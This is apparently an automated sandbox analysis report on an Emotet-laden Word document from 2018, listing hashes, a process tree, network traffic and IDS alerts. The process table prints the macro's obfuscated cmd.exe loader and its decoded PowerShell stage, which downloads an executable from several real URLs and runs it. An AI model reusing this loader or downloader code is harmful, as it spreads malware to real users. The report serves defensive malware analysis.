File name: | new-agreement-December.doc |
Full analysis: | https://app.any.run/tasks/d36ef111-dd76-42ff-b261-fc69e4c99b91 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 09:32:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 19:23:00 2018, Last Saved Time/Date: Wed Dec 5 19:23:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | AE1344F1D20B089CA60ED6780B3EEF56 |
SHA1: | C2786573256118447DB54A965E224F5C5C1EA102 |
SHA256: | FE65E845B5A5F2B6F4E54002786DF236053CD386B94991D75C5A53B422F5D908 |
SSDEEP: | 1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 37 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 33 |
Words: | 5 |
Pages: | 1 |
ModifyDate: | 2018:12:05 19:23:00 |
CreateDate: | 2018:12:05 19:23:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\new-agreement-December.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3844 | c:\OWXcIFjBpA\YLWOnlzHVGSD\DsaKFqtTET\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set B8=hfXsnaMYjJGzljOuSi8bq'CpxWkZw(+{t3/Romd65AE-N0 9@1H=,.}7);yrc2Fg\eI4$:Dv&&for %a in (68;15;38;37;51;21;26;15;50;21;57;68;20;32;9;51;4;65;28;43;36;19;13;65;60;32;46;44;65;32;53;25;65;19;22;12;17;65;4;32;57;68;11;70;20;51;21;0;32;32;23;69;34;34;49;39;61;53;61;67;33;53;55;53;49;55;47;34;28;23;43;60;36;4;32;65;4;32;34;32;0;65;37;65;3;34;5;12;71;65;36;23;0;5;3;65;33;34;37;3;1;43;1;17;12;65;3;34;61;44;25;41;9;20;48;0;32;32;23;69;34;34;49;33;53;49;49;67;53;61;40;53;61;33;49;34;44;62;67;48;0;32;32;23;69;34;34;5;59;60;65;12;65;60;32;59;17;60;4;13;53;60;36;37;34;70;48;0;32;32;23;69;34;34;12;5;26;15;4;5;32;53;59;15;34;44;48;0;32;32;23;69;34;34;23;5;15;12;36;1;36;38;59;5;53;60;36;37;53;19;59;34;32;47;44;1;21;53;16;23;12;17;32;29;21;48;21;56;57;68;26;23;15;51;21;44;35;42;21;57;68;20;15;28;46;51;46;21;18;39;40;21;57;68;38;62;38;51;21;19;19;32;21;57;68;32;27;17;51;68;65;4;71;69;32;65;37;23;30;21;64;21;30;68;20;15;28;30;21;53;65;24;65;21;57;1;36;59;65;5;60;0;29;68;7;41;17;46;17;4;46;68;11;70;20;56;31;32;59;58;31;68;20;32;9;53;70;36;28;4;12;36;5;38;62;17;12;65;29;68;7;41;17;52;46;68;32;27;17;56;57;68;15;41;42;51;21;3;6;5;21;57;66;1;46;29;29;10;65;32;43;66;32;65;37;46;68;32;27;17;56;53;12;65;4;63;32;0;46;43;63;65;46;18;45;45;45;45;56;46;31;66;4;71;36;26;65;43;66;32;65;37;46;68;32;27;17;57;68;17;59;44;51;21;27;32;42;21;57;19;59;65;5;26;57;54;54;60;5;32;60;0;31;54;54;68;12;70;13;51;21;27;17;19;21;57;73)do set 9L40=!9L40!!B8:~%a,1!&&if %a==73 powershell.exe "!9L40:~-456!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2340 | CmD /V/C"set B8=hfXsnaMYjJGzljOuSi8bq'CpxWkZw(+{t3/Romd65AE-N0 9@1H=,.}7);yrc2Fg\eI4$:Dv&&for %a in (68;15;38;37;51;21;26;15;50;21;57;68;20;32;9;51;4;65;28;43;36;19;13;65;60;32;46;44;65;32;53;25;65;19;22;12;17;65;4;32;57;68;11;70;20;51;21;0;32;32;23;69;34;34;49;39;61;53;61;67;33;53;55;53;49;55;47;34;28;23;43;60;36;4;32;65;4;32;34;32;0;65;37;65;3;34;5;12;71;65;36;23;0;5;3;65;33;34;37;3;1;43;1;17;12;65;3;34;61;44;25;41;9;20;48;0;32;32;23;69;34;34;49;33;53;49;49;67;53;61;40;53;61;33;49;34;44;62;67;48;0;32;32;23;69;34;34;5;59;60;65;12;65;60;32;59;17;60;4;13;53;60;36;37;34;70;48;0;32;32;23;69;34;34;12;5;26;15;4;5;32;53;59;15;34;44;48;0;32;32;23;69;34;34;23;5;15;12;36;1;36;38;59;5;53;60;36;37;53;19;59;34;32;47;44;1;21;53;16;23;12;17;32;29;21;48;21;56;57;68;26;23;15;51;21;44;35;42;21;57;68;20;15;28;46;51;46;21;18;39;40;21;57;68;38;62;38;51;21;19;19;32;21;57;68;32;27;17;51;68;65;4;71;69;32;65;37;23;30;21;64;21;30;68;20;15;28;30;21;53;65;24;65;21;57;1;36;59;65;5;60;0;29;68;7;41;17;46;17;4;46;68;11;70;20;56;31;32;59;58;31;68;20;32;9;53;70;36;28;4;12;36;5;38;62;17;12;65;29;68;7;41;17;52;46;68;32;27;17;56;57;68;15;41;42;51;21;3;6;5;21;57;66;1;46;29;29;10;65;32;43;66;32;65;37;46;68;32;27;17;56;53;12;65;4;63;32;0;46;43;63;65;46;18;45;45;45;45;56;46;31;66;4;71;36;26;65;43;66;32;65;37;46;68;32;27;17;57;68;17;59;44;51;21;27;32;42;21;57;19;59;65;5;26;57;54;54;60;5;32;60;0;31;54;54;68;12;70;13;51;21;27;17;19;21;57;73)do set 9L40=!9L40!!B8:~%a,1!&&if %a==73 powershell.exe "!9L40:~-456!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2232 | powershell.exe "$udm='kuH';$qtJ=new-object Net.WebClient;$zDq='http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq@http://13.114.25.231/NF4@http://arcelectricnj.com/D@http://lakunat.ru/N@http://paulofodra.com.br/t9Nf'.Split('@');$kpu='NRE';$quw = '865';$dFd='bbt';$tZi=$env:temp+'\'+$quw+'.exe';foreach($YAi in $zDq){try{$qtJ.DownloadFile($YAi, $tZi);$uAE='sMa';If ((Get-Item $tZi).length -ge 80000) {Invoke-Item $tZi;$irN='ZtE';break;}}catch{}}$lDj='Zib';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3344 | "C:\Users\admin\AppData\Local\Temp\865.exe" | C:\Users\admin\AppData\Local\Temp\865.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2192 | "C:\Users\admin\AppData\Local\Temp\865.exe" | C:\Users\admin\AppData\Local\Temp\865.exe | 865.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
3752 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 865.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2328 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Version: 6.1.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA684.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2232 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0QHQXLUV00Y4T3N7SYE6.temp | — | |
MD5:— | SHA256:— | |||
2232 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b28a.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2192 | 865.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:590C02FFAD5A2D4D96D521C1119FFB35 | SHA256:7FD3358F59A75D9980045E27F2D4A703EC12D5C035FF99CE9A2B06767BBC1580 | |||
2232 | powershell.exe | C:\Users\admin\AppData\Local\Temp\865.exe | executable | |
MD5:590C02FFAD5A2D4D96D521C1119FFB35 | SHA256:7FD3358F59A75D9980045E27F2D4A703EC12D5C035FF99CE9A2B06767BBC1580 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A66FA7B6C40259F53F2967B38084B660 | SHA256:9584370CB64A093AB4759892A75A1755D4AF838969C7A7F926E0D8ED0695F1F2 | |||
2232 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$w-agreement-December.doc | pgc | |
MD5:AC25F85EDDF204979C3C7FFA93285867 | SHA256:6B6A5A8469C93ABE0DE7C26FD1D0BEAB96B06ADDCA96ECE0B4B897C0C24F6BBF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2328 | archivesymbol.exe | GET | — | 114.55.106.210:443 | http://114.55.106.210:443/ | CN | — | — | malicious |
2232 | powershell.exe | GET | 301 | 162.243.7.179:80 | http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq | US | html | 355 b | suspicious |
2328 | archivesymbol.exe | GET | 200 | 54.39.179.152:80 | http://54.39.179.152/ | FR | binary | 132 b | malicious |
2232 | powershell.exe | GET | 200 | 162.243.7.179:80 | http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq/ | US | executable | 164 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2328 | archivesymbol.exe | 114.55.106.210:443 | — | Hangzhou Alibaba Advertising Co.,Ltd. | CN | malicious |
2232 | powershell.exe | 162.243.7.179:80 | — | Digital Ocean, Inc. | US | suspicious |
2328 | archivesymbol.exe | 54.39.179.152:80 | — | OVH SAS | FR | malicious |
PID | Process | Class | Message |
---|---|---|---|
2232 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2232 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2232 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
2232 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2328 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2328 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2328 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2328 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |